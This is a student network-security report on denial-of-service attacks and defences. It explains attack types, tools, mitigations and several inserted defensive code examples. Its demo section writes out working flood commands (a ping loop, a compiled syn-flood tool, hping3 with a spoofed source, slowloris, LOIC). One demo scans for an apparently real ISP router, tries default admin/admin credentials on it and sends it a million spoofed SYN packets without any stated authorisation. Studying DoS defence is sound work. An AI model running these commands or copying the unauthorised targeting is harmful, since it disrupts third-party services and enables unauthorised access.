TOPIC: STUDYING DOS ATTACK TECHNIQUES AND COUNTERMEASURES
Supervisor: HUNH TH. Students: 1. NGUYN VN CNG, student ID 0951150005; 2. V TN CNG, student ID 0951150006
PREFACE
Network security is now a top priority for any company that runs a network, large or small. Domestic and foreign hackers constantly look for ways to attack and break into systems to steal internal information, and that sensitive information often affects the survival of the company. Network administrators therefore try to protect their systems as well as they can and to close every hole. Yet one very old kind of attack, denial of service, has never lost its danger to a network. The damage DoS causes is not only money and effort but also a great deal of recovery time. DoS and DDoS remain an unsolved problem: no countermeasure stops these attacks completely. Given this need, our group chose the topic "Studying DoS attack techniques and countermeasures" for the Network Security project. The goal is to understand the kinds of attacks and, from there, to propose ways of defending against DoS.
TABLE OF CONTENTS
TOPIC: DOS ATTACK
PART I: OVERVIEW OF NETWORK ATTACKS
I. Events and network attacks
II. Understanding network attacks
III. Threats to network security
PART II: DENIAL OF SERVICE (DOS) ATTACKS
I. What is a DoS attack?
II. DoS attack techniques
III. Some DoS attack tools
PART III: DEFENDING AGAINST DOS
I. Countermeasures against DoS
II. DoS protection tools
III. DoS penetration testing
PART IV: GUIDE AND DEMO OF DOS ATTACKS
... in unencrypted form, or the extremely weak passwords that administrators use.
+ Unauthorized use of user accounts and privileges
+ Theft of hardware
+ Theft of software
+ Running code that damages systems
+ Running code that damages and corrupts data
+ Modifying stored data
+ Stealing data
+ Using data for financial gain or industrial espionage
+ Taking actions that prevent legitimate, authorized users from accessing network services and resources
+ Taking actions that exhaust network resources and bandwidth
2. No risk-handling plan
Business computer systems and networks constantly face many security risks; anything from physical damage to attacks by intruders or viruses can harm data. Quite a few small and medium-sized businesses have no policy for responding to data loss and no recovery plan. When an incident happens, most are confused and fall back on improvised measures.
6. Loss of mobile devices
Many businesses, and recently even some large firms, have lost important data through stolen laptops and lost mobile phones or USB flash drives. The data on these devices is rarely encrypted or password-protected, so it is easy to read for whoever ends up holding them.
7. Web server weaknesses
Many businesses still pay little attention to which server their website is hosted on and how well it is secured. As a result the company's business website becomes easy prey for SQL injection attacks or botnets.
9. Email carrying malicious code
Spam bombardment floods your mailbox with attractive subject lines: scandals, racy pictures, business offers and so on. A single wrong click is enough for the computer to download malicious code that opens the way for a string of malware to follow it in.
10. Unpatched security flaws
More than 90% of attacks on network systems try to exploit known security flaws. Although vendors usually release patches soon after a flaw is discovered, some businesses do not take patching seriously, leaving those flaws wide open to attack.
The TCP/IP protocol suite is a security weak point because it was designed as an open standard to make exchanging information easy. That is what made it so widely used, but it also makes it easy to attack, since almost everyone is familiar with how TCP/IP works. Two protocols in the TCP/IP suite that Cisco singles out as inherently insecure are SMTP (TCP) and SNMP (UDP). Typical attacks on these protocols are IP spoofing, man-in-the-middle and session replay.
12.1.2) Operating system weaknesses: Every operating system has weaknesses; Linux and Unix are considered to have fewer than Windows. In practice most people run some version of Windows.
12.1.3) Network equipment weaknesses: Most network devices, such as servers, switches and routers, have security weaknesses. A good policy for configuring and installing network devices greatly reduces the impact of these weaknesses.
Some companies use real (public) Internet addresses for their hosts and servers. This creates a weakness that hackers can easily exploit to gather information. Using NAT or PAT addresses the problem: private addresses let you number hosts and servers without exposing real addresses, while the real addresses are routed out to the Internet by the border router. This alone is not a complete solution. The ports on the interface facing the Internet must be open so that users can reach the Internet and the Internet can reach back; that is a hole in the firewall that a hacker can attack. You can add security by using conduits, which are basic secured connections. The Cisco Secure Private Internet Exchange (PIX) firewall is presented as the preferred way to provide good security for the network.
12.2.4) Unsecured default settings in products: Many hardware products ship without a password, or with a default password, so that the administrator can configure the device easily. This makes the job easier, since some devices only need to be plugged in to work, but it also makes attacking the network easy. A secure configuration policy should therefore be applied to every device before it is installed on the network.
12.2.5) Misconfigured network equipment: Device misconfiguration is a hole that can be exploited to attack the network: weak passwords, no security policy, or unsecured user accounts are all configuration errors. The hardware and the protocols running on the devices also create security holes; without a security policy for them, hackers will exploit them. If SNMP is left at its default settings, information can be stolen quickly and easily, so make sure SNMP is disabled or its defaults are changed.
12.3) Policy weaknesses:
The security policy describes how and where security is implemented. This is an important condition for security to be effective.
2. Goals of a DoS attack
+ Consume network bandwidth and flood the network, so that it can no longer serve other services to normal users.
+ Break the connection between two machines and prevent access to a service.
+ Prevent particular users from reaching a service.
+ Prevent a service from being reachable by anyone.
When a DoS attack occurs, users experience the service as:
+ Disabled network
+ Disabled organization
+ Financial loss
1. Out of Band (OOB) attack
This DoS attack only applies to computers running Windows 9x (it is commonly known as WinNuke). The hacker sends packets carrying "Out of Band" data to port 139 of the target (port 139 is the NetBIOS port, and it accepts packets with the Out of Band flag set). When the victim receives such a packet, a blue screen error appears: the Windows program receives the packets but does not know how to handle the Out of Band data, and the system crashes.
2. Ping of Death
The Ping of Death (PoD) attack can paralyze a network by exploiting a flaw in the TCP/IP implementation. The maximum size of an IP datagram is 65,535 bytes. If packets larger than this maximum are sent with the ping command, the target machine hangs. Since sending a packet larger than the limit violates the IP protocol, the hacker sends the packet as fragments instead. When the victim reassembles the fragments, the resulting datagram exceeds the maximum size, which overflows the reassembly buffer and crashes the device. Most devices produced after 1998 are immune to this attack.
3. Teardrop
All data sent over the network from a source system to a destination goes through two processes: the data is divided into fragments at the source, and each fragment carries an offset value that gives its position within the original datagram. When the fragments reach the destination, the destination uses the offsets to put them back in their original order. Exploiting this, an attacker only needs to send the target a series of packets whose offset values overlap. The target cannot reassemble them, loses control, and may crash, reboot or stop working if the number of overlapping fragments is large enough.
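The reassembly logic that both Ping of Death and Teardrop abuse, as an added example (Python, written for this page; not code from the report or from any real network stack): a fragment reassembler that rejects overlapping fragments and datagrams that would exceed 65,535 bytes. Offsets are modelled in bytes rather than the 8-byte units of the real IPv4 header, and the three sample fragment sets are constructed, not captured.

```python
"""IPv4 fragment reassembly with the checks that defeat Teardrop and Ping of Death.

Added example, not part of the original report. Fragments are modelled with
byte offsets (real IPv4 offsets are in 8-byte units) and nothing is read
from the network; the sample datagrams below are constructed.
"""
from dataclasses import dataclass

MAX_DATAGRAM = 65535  # largest IPv4 datagram, header included


@dataclass
class Fragment:
    offset: int      # byte position of this fragment's data in the datagram
    more: bool       # "more fragments" (MF) flag
    payload: bytes


class ReassemblyError(Exception):
    pass


def reassemble(frags):
    """Put fragments back together; raise ReassemblyError on attack patterns.

    - Teardrop: a fragment starts before the previous one ended (overlap).
    - Ping of Death: the reassembled datagram would exceed 65,535 bytes.
    - Incomplete: a gap between fragments, or MF still set on the last one.
    A stack that trusted the offsets blindly is what these attacks crashed.
    """
    ordered = sorted(frags, key=lambda f: f.offset)
    expected = 0          # next offset we expect: the end of the previous fragment
    out = bytearray()
    for f in ordered:
        end = f.offset + len(f.payload)
        if end > MAX_DATAGRAM:
            raise ReassemblyError(f"oversized: fragment ends at {end}")
        if f.offset < expected:
            raise ReassemblyError(f"overlap: offset {f.offset} < {expected}")
        if f.offset > expected:
            raise ReassemblyError(f"gap: offset {f.offset} > {expected}")
        out += f.payload
        expected = end
    if not ordered or ordered[-1].more:
        raise ReassemblyError("incomplete: last fragment still has MF set")
    return bytes(out)


def classify(frags):
    """Label a fragment set for logging or alerting."""
    try:
        reassemble(frags)
        return "ok"
    except ReassemblyError as e:
        kind = str(e).split(":")[0]
        return {"overlap": "teardrop", "oversized": "ping_of_death"}.get(kind, "incomplete")


# Constructed samples (not captures).
NORMAL = [Fragment(0, True, b"A" * 1480), Fragment(1480, False, b"B" * 20)]
TEARDROP = [Fragment(0, True, b"A" * 36), Fragment(24, False, b"B" * 36)]   # 2nd starts inside 1st
PING_OF_DEATH = [Fragment(i * 1480, True, b"\x00" * 1480) for i in range(44)] \
    + [Fragment(44 * 1480, False, b"\x00" * 500)]                           # would reassemble to 65,620 bytes

if __name__ == "__main__":
    for name, frags in [("normal", NORMAL), ("teardrop", TEARDROP), ("ping_of_death", PING_OF_DEATH)]:
        print(name, "->", classify(frags))
```

The two checks are exactly what vendors added after 1997/1998: the oversized test must run before any buffer is allocated for the datagram, and the overlap test must run before the fragment is copied in, otherwise the copy itself is what corrupts memory.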
4. SYN Attack
(Figure: the normal TCP three-way handshake, client port 1024-65535 to server port 1-1023, e.g. 80: client SYN, server SYN/ACK, client ACK; and the SYN flood, where the attacker/agent sends SYNs and the server's SYN/ACKs are never answered with an ACK.)
In a SYN attack the hacker sends the target a stream of SYN packets with non-existent source IP addresses. On receiving each SYN the target replies to the bogus address and waits for a response from it. Because the address does not exist, the target waits and waits, keeping each pending "request" in memory, which wastes a considerable amount of memory on the server that should be used for other work rather than for waiting on replies that never come. If many packets with forged IP addresses are sent at once, the system becomes overloaded and crashes or reboots.
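The half-open queue the paragraph describes, and the SYN-cookie defence that removes the per-connection state, as an added example (Python, written for this page; not code from the report and not a real TCP stack). It is an in-memory model: the backlog size of 128, the 60-second timeout, the addresses and the server secret are all assumed values, and no packets are sent.

```python
"""Why a SYN flood exhausts a listener, and why SYN cookies do not care.

Added example, not from the report: an in-memory model of a TCP listener's
half-open queue. Backlog size, timeout, addresses and the secret are assumed
values; no packets are sent.
"""
import hashlib
import hmac

BACKLOG = 128        # assumed capacity of the half-open (SYN_RECV) queue
SYN_TIMEOUT = 60.0   # seconds a half-open entry lives before being retired


class Listener:
    def __init__(self, syn_cookies=False, secret=b"assumed-server-secret"):
        self.syn_cookies = syn_cookies
        self.secret = secret
        self.half_open = {}       # (src_ip, src_port) -> expiry time
        self.established = set()
        self.dropped = 0

    def _expire(self, now):
        for key in [k for k, t in self.half_open.items() if t <= now]:
            del self.half_open[key]

    def _cookie(self, src_ip, src_port, now):
        """Stateless ISN: MAC of the peer address and a coarse timestamp."""
        msg = f"{src_ip}:{src_port}:{int(now) // 64}".encode()
        mac = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, src_ip, src_port, now):
        """Handle a SYN. Return the ISN sent in SYN/ACK, or None if dropped."""
        self._expire(now)
        if self.syn_cookies:
            return self._cookie(src_ip, src_port, now)      # nothing stored
        if len(self.half_open) >= BACKLOG:
            self.dropped += 1                               # queue full: SYN discarded
            return None
        self.half_open[(src_ip, src_port)] = now + SYN_TIMEOUT
        return 0                                            # any ISN will do here

    def on_ack(self, src_ip, src_port, ack, now):
        """Handle the final ACK. Return True if the connection is established."""
        self._expire(now)
        key = (src_ip, src_port)
        if self.syn_cookies:
            ok = ((ack - 1) & 0xFFFFFFFF) == self._cookie(src_ip, src_port, now)
        else:
            ok = self.half_open.pop(key, None) is not None
        if ok:
            self.established.add(key)
        return ok


def flood_then_connect(syn_cookies, spoofed_syns=1000):
    """Send `spoofed_syns` SYNs from made-up sources that never ACK, then try
    one honest handshake from 192.0.2.10. Returns what happened."""
    srv = Listener(syn_cookies)
    for i in range(spoofed_syns):
        src = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"   # spoofed, never answers
        srv.on_syn(src, 40000 + i, now=1.0)
    isn = srv.on_syn("192.0.2.10", 51234, now=2.0)
    accepted = isn is not None and srv.on_ack("192.0.2.10", 51234, isn + 1, now=2.5)
    return {"accepted": accepted, "half_open": len(srv.half_open), "dropped": srv.dropped}
```

Without cookies the 128-entry queue fills with entries that will sit there for the full timeout, and the honest client's SYN is the 873rd packet dropped; with cookies the server stores nothing per SYN, so the flood costs it only the SYN/ACK replies and the honest ACK still verifies. Real SYN cookies (Linux: net.ipv4.tcp_syncookies=1) also encode the negotiated MSS in the cookie and accept the previous timestamp window; the toy cookie above omits both.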
5. Land Attack
The Land attack is similar to the SYN attack, but instead of non-existent IP addresses the hacker uses the victim's own IP address as the source. This creates an endless loop inside the victim's system: one side waits for a reply while the other side can never send one.
==> The result is congestion.
6. Smurf Attack
Figure 2.6: Smurf attack model.
A Smurf attack involves three parties: the hacker who launches the attack, the amplifying network (which unwittingly does the hacker's bidding) and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifying network. The special thing is that these ICMP packets carry the victim's IP address as their source. When the packets reach the broadcast address, every computer in the amplifying network believes the victim sent them, and they all reply to the victim at once. The victim cannot cope with the huge volume of replies and quickly stops working, crashes or reboots. So with only a small number of ICMP packets sent, the amplifying network multiplies them many times over; the amplification ratio depends on the number of machines in the amplifying network. The hacker's task is to collect as many networks or routers as possible that forward packets directly to the broadcast address without filtering the source address on the outbound interface. With such networks in hand, the hacker can easily run Smurf attacks against the chosen targets.
==> Attack by amplification.
7. Fraggle Attack
Similar to the Smurf attack, but instead of ICMP ECHO REQUEST packets this attack sends UDP ECHO packets to the target. Fraggle is considered much more dangerous than Smurf: the attacker sends an ECHO REQUEST with a broadcast destination address, every host in that network immediately sends a REPLY to the victim's echo port, the victim then sends an ECHO REPLY back to the broadcast address, and the process can keep going indefinitely.
8. UDP Flooding
The UDP attack requires two systems to take part. The hacker puts the systems into a loop exchanging data over UDP: the source IP of the packets is spoofed to the loopback address (127.0.0.1) and the packets are sent to the victim's UDP echo port (7). The victim replies to messages it believes 127.0.0.1 (itself) sent, and so enters an endless loop. Many systems do not accept packets from the loopback address, however, so the hacker instead spoofs the IP address of some other machine on the victim's network and floods the victim with UDP. If this does not succeed, your own machine is the one that gets flooded.
9. DNS attack
A hacker can change an entry on the victim's Domain Name Server so that it points to a website of the hacker's choosing. When a client asks the DNS server to resolve the tampered name to an IP address, the DNS server (whose cache the hacker has altered) immediately returns the IP the hacker pointed it at. Instead of reaching the site they wanted, victims land on a page the hacker created. A very effective way to deny service.
Figure 2.10: DDoS attack model.
DDoS requires at least several participants. First the hackers break into poorly secured computer networks and install a DDoS server program on those systems. The hackers then agree on a time, use a DDoS client to connect to the DDoS servers, and simultaneously order those servers to launch the DDoS attack on the victim.
1. DoSHTTP + Sprut:
These two programs flood a website by sending request packets to port 80 of the site. DoSHTTP is an easy-to-use, powerful HTTP flood tool intended for testing on Windows. It includes URL verification, HTTP redirect handling and performance monitoring. IT professionals can use it to test web server performance and assess security.
2. LOIC
LOIC is a denial-of-service application written in C#. It performs a DoS attack (or, when used by many people at once, a DDoS attack) on a target website by flooding the server with TCP or UDP packets to disrupt that host's service. LOIC can also join a voluntary botnet by connecting to a remote server that directs the attacks; the report states that 40,000 people were connected to that botnet at the time of writing.
3. UDP Flood
UDPFlood is a program that sends UDP packets to an IP address and port chosen by the user. The packet contents can be a text string, random data, or data read from a file, and the tool can be used to test how well a server copes.
4. rDoS
This TCP-based tool performs a SYN flood. Just enter the victim's IP and the port to attack and the program runs by itself.
Note: be careful when using it and exit it properly; otherwise your computer will start DoS-ing the designated victim by itself as soon as it boots, before you do anything. You can confirm this with Wireshark.
3.3 Deflecting the attack
A system set up with deliberately limited security, known as a honeypot, acts as a lure for the attacker. It serves to gather information from the attacker by keeping a record of activity and learning the attack patterns and tools the attacker uses. A defense-in-depth approach with IPSec at different points of the network can redirect suspicious DoS traffic to the honeypot. A honeypot is an information resource built to deceive unauthorized users and intruders, attract their attention and keep them away from the real system.
3.4 Mitigating the attack
Load balancing:
o The provider can increase bandwidth on critical links to prevent or absorb an attack.
o Replicating servers provides additional protection.
o Load balancing across a multi-server architecture improves normal performance and reduces the impact of a DoS attack.
Throttling:
o Configure routers to throttle the traffic reaching a server to a level the server can safely handle.
o This throttling keeps a flood from damaging the server.
o It can be extended to throttle DoS attack flows while favoring legitimate user traffic, for better results.
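The throttling idea above, as an added example (Python, written for this page; not code from the report): a per-source token-bucket limiter of the kind a router or front-end applies before traffic reaches the server. The rate (10 packets/s), burst (20) and the packet stream are constructed; a real deployment would use the router's or firewall's own rate-limit feature (for example iptables hashlimit) with the same logic.

```python
"""Per-source throttling with token buckets, applied in front of the server.

Added example, not from the report. Rates, burst size and the packet stream
are constructed; the bucket logic is the same one router rate limiters use.
"""
from collections import defaultdict


class TokenBucket:
    def __init__(self, rate, burst):
        self.rate = rate            # tokens refilled per second (sustained rate)
        self.burst = burst          # bucket capacity (allowed burst)
        self.tokens = float(burst)
        self.last = 0.0

    def allow(self, now):
        """Refill for the elapsed time, then spend one token if one is available."""
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class SourceThrottle:
    """One bucket per source IP, so a flooding source cannot starve the others."""
    def __init__(self, rate=10.0, burst=20):
        self.buckets = defaultdict(lambda: TokenBucket(rate, burst))
        self.passed = defaultdict(int)
        self.dropped = defaultdict(int)

    def process(self, packets):
        """packets: iterable of (timestamp, src_ip). Returns (passed, dropped) per source."""
        for now, src in packets:
            if self.buckets[src].allow(now):
                self.passed[src] += 1
            else:
                self.dropped[src] += 1
        return dict(self.passed), dict(self.dropped)


def build_stream():
    """Constructed stream: 203.0.113.5 sends 1000 packets in one second
    (a flood); 192.0.2.10 sends 5 packets 100 ms apart (a normal client)."""
    flood = [(i / 1000.0, "203.0.113.5") for i in range(1000)]
    normal = [(0.1 * i, "192.0.2.10") for i in range(5)]
    return sorted(flood + normal)


def run_demo():
    return SourceThrottle(rate=10.0, burst=20).process(build_stream())


if __name__ == "__main__":
    passed, dropped = run_demo()
    print("passed:", passed)
    print("dropped:", dropped)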
3.5 Forensics
Analyze router, firewall and IDS logs to identify the source of the DoS traffic. Although attackers usually spoof the source address, tracing the IP back with the immediate help of the ISP and law enforcement agencies can allow the perpetrators to be caught.
Traffic pattern analysis: data can be analyzed after the attack to look for distinctive characteristics of the attack traffic. DoS traffic patterns help the network administrator develop filtering rules that keep such traffic from entering or leaving the network. Using these characteristics, the data can also be used to update the load-balancing and throttling countermeasures.
4. DoS protection
4.1 ISP level
Many ISPs simply block all requests during a DoS attack, which denies legitimate traffic access to the service as well. ISPs offer cloud-based DoS protection for Internet links so that the links cannot be saturated by an attack: attack traffic is redirected to the ISP during the attack, filtered, and sent back. The network administrator can ask the ISP to block the offending source IPs and move the site to another IP once DNS propagation has completed.
(Figure: configuration enabling TCP Intercept on Cisco IOS software)
4.2 IntelliGuard protection system
IntelliGuard DPS helps mitigate DoS attacks with a design focused on passing legitimate traffic rather than on dropping attack traffic. A layered protection strategy identifies access by prioritizing customers and ranking their access. Multi-level traffic management configures traffic limits and ensures traffic management for every component of the network.
II. DOS PROTECTION TOOLS
1. NetFlow Analyzer
NetFlow Analyzer is a complete traffic analysis tool that uses flow analysis technology to provide real-time visibility into network bandwidth performance. It is primarily a bandwidth monitoring tool, used to optimize thousands of networks worldwide by giving a comprehensive view of network bandwidth and traffic patterns. It is a unified solution that collects, analyzes and reports on how your network bandwidth is being used and by whom. Besides optimizing bandwidth use, it performs network forensics and traffic analysis.
2. Other tools
D-Guard Anti-DDoS Firewall
D-Guard Anti-DDoS Firewall provides reliable and fast DDoS protection for online businesses, media services, essential public infrastructure and Internet service providers. As a professional anti-DDoS firewall, D-Guard claims to protect against most attack types, including DoS/DDoS, Super DDoS, DrDoS, fragment attacks, SYN flood, IP flood, UDP flood, UDP mutation, random UDP flood, ICMP and IGMP attacks, ARP spoofing, HTTP proxy attacks, CC flood and CC proxy attacks.
D-Guard goes beyond basic DDoS mitigation, with a design focused on passing legitimate traffic rather than on dropping attack traffic, so that attack scenarios are handled with minimal performance degradation.
FortGuard Firewall
FortGuard Firewall is a solution that helps users defend against DDoS attacks with high accuracy and performance. It is a small but powerful anti-DDoS firewall with a built-in Intrusion Prevention System. It defends against SYN floods, TCP floods and other DDoS attacks and can show attack packets in real time. The program lets you disable or enable proxy access per application and, according to the vendor, can block more than 2000 kinds of hacker activity.
III. DoS penetration testing
1. Test the web server with automated tools such as Web Application Stress (WAS) and JMeter for load capacity, server performance, locking and scalability.
2. Scan the system with automated tools such as Nmap, GFI LANguard and Nessus to discover any system vulnerable to DoS.
3. Flood the target with connection-request packets using tools such as Trin00, Tribe Flood Network and TFN2K.
4. Port flooding attacks fill a port and drive up its usage, holding all connection requests until the port is congested. Use tools such as Mutilate and Pepsi5 to automate port flooding.
5. Use tools such as Mail Bomber, Attache Bomber and Advanced Mail Bomber to send a large volume of mail to the target mail server.
6. Fill in forms with arbitrary, very long content to flood the website.
If you want to open 20 ping windows at once, combine ping with a For command:
For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000
This opens 20 command windows at once, each pinging 192.168.1.254 continuously. Note that -l 36000 sends 36,000-byte payloads, which are split into many IP fragments on the wire; this is a large-packet ICMP flood rather than a true Ping of Death, which needed a reassembled datagram larger than 65,535 bytes.
This attack sends ping requests to the victim continuously, and the victim handles each one by sending an ICMP echo reply back to the attacker's machine.
(Wireshark capture while under an ICMP flood using Ping of Death)
Conclusion: the ICMP attack is the most classic kind of attack and very easy to carry out. Poorly configured routers are easily attacked and hang quickly.
For example, a scan_adsl.txt file containing the following means that IP 118.68.226.7 has port 80 open:
Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7)
Host is up (0.037s latency).
PORT STATE SERVICE
80/tcp open http
We open this IP in a web browser to check the router's web page and try the default username admin and password admin.
We carry out a SYN flood attack against port 80 of this ADSL router using the syn-flood-alpha1.tar.gz tool, built as follows.
root@bt:~/Desktop# ls
scan_adsl.txt  syn-flood-alpha1.tar.gz
root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz
syn-flood/
syn-flood/Makefile
syn-flood/gpl.txt
syn-flood/syn-flood.cpp
root@bt:~/Desktop# cd syn-flood
root@bt:~/Desktop/syn-flood# ls
gpl.txt  Makefile  syn-flood.cpp
root@bt:~/Desktop/syn-flood# make
g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp
g++ -o syn-flood syn-flood.o
We run the attack with the command below, sending 1,000,000 SYN packets:
root@bt:~/Desktop/syn-flood# ./syn-flood
Usage: ./syn-flood --IP IP --port PORT [verbose]
  -h --help      Display this usage information.
  -i --IP        Destination IP address.
  -p --port      Destination port.
  -n --num       Number of packets to send.
  -v --verbose   Print verbose messages.
root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000
Sent 1000000 packets.
Analyzing the tool with Wireshark shows it sending 1,000,000 TCP SYN packets to the victim ADSL router at 118.68.226.7, each with a different spoofed source IP.
Option meanings:
-a    spoof the source address as 192.168.1.254
-p    destination port 445
-S    set the SYN flag (SYN flood attack)
-i --interval   wait (uX for X microseconds, for example -i u1000)
--fast    alias for -i u10000 (10 packets per second)
--faster  alias for -i u1000 (100 packets per second)
--flood   send packets as fast as possible; do not show replies.
root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 -c 100000
-c means count: we send 100000 packets to the victim.
On the victim machine, if it is under SYN flood, checking connection state with netstat -ano shows a very large number of connections in the SYN state.
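The netstat check above, as an added example (Python, written for this page; not code from the report): it parses netstat output, counts half-open connections per remote address and flags sources over a threshold. The netstat lines are constructed to look like Windows netstat -ano output and are not a real capture.

```python
"""Count half-open TCP connections per remote address from `netstat -ano`
output, the check the report describes on the victim.

Added example, not from the report; the sample below is constructed to look
like Windows `netstat -ano` output (Linux prints SYN_RECV instead).
"""
import re
from collections import Counter

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.101:445      192.168.1.254:1025     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1026     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1027     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1028     SYN_RECEIVED    4
  TCP    192.168.1.101:3389     192.168.1.50:49211     ESTABLISHED     1234
  TCP    192.168.1.101:445      192.168.1.50:49300     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1029     SYN_RECEIVED    4
"""

# Proto, local ip:port, remote ip:port, state; PID is optional (Linux has none).
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)")
HALF_OPEN_STATES = ("SYN_RECEIVED", "SYN_RECV")


def half_open_by_source(netstat_text):
    """Return {remote_ip: number of half-open connections}."""
    counts = Counter()
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(5) in HALF_OPEN_STATES:
            counts[m.group(3)] += 1
    return dict(counts)


def total_half_open(netstat_text):
    return sum(half_open_by_source(netstat_text).values())


def flood_suspects(netstat_text, threshold=3):
    """Remote addresses with at least `threshold` half-open connections."""
    return sorted(ip for ip, n in half_open_by_source(netstat_text).items() if n >= threshold)


if __name__ == "__main__":
    print("half-open total:", total_half_open(NETSTAT_SAMPLE))
    print("per source:", half_open_by_source(NETSTAT_SAMPLE))
    print("suspects:", flood_suspects(NETSTAT_SAMPLE))
```

Two cautions when reading the result. In the hping3 demo the "source" is whatever -a spoofed (here the gateway 192.168.1.254), and the syn-flood tool randomizes its source per packet, so the per-source count identifies the forged address, not the attacker; blocking 192.168.1.254 would cut the victim off from its own gateway. The reliable symptom is the total number of half-open entries and how fast it grows, which is also what SYN cookies (net.ipv4.tcp_syncookies on Linux) and TCP Intercept on Cisco IOS act on.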
4. PHP DoS
We upload the PHP DoS source to a web server and use that server to attack another server. First, upload the PHP DoS program source to the web server.
Use a web browser to open the PHP DoS page (or use the copy in the accompanying folder) and launch the attack against the chosen victim.
When the attack finishes, the program reports the number of packets sent.
Run a DoS against a victim with the command perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5; see the program's help for the meaning of each option. Unlike the flooding tools above, Slowloris does not consume bandwidth: it opens many connections and keeps each one alive by sending partial HTTP headers slowly, so the web server's connection pool is exhausted while traffic stays low.
(Screenshots of the attack and of closing the program)
7. LOIC
Use LOIC to attack the website http://abc.com in several modes (TCP, UDP, HTTP), adjusting the attack speed as desired.
In particular, LOIC can connect volunteers into a botnet that attacks the target together.
=> Conclusion
Based on the experimental results and the defense model, we now understand better what a denial-of-service (DoS) attack is. The experiments show how destructive DoS attacks are to a system: they can congest it, a large attack can force it to reboot, and if the system handles finances, the financial impact on the company that owns it can be considerable.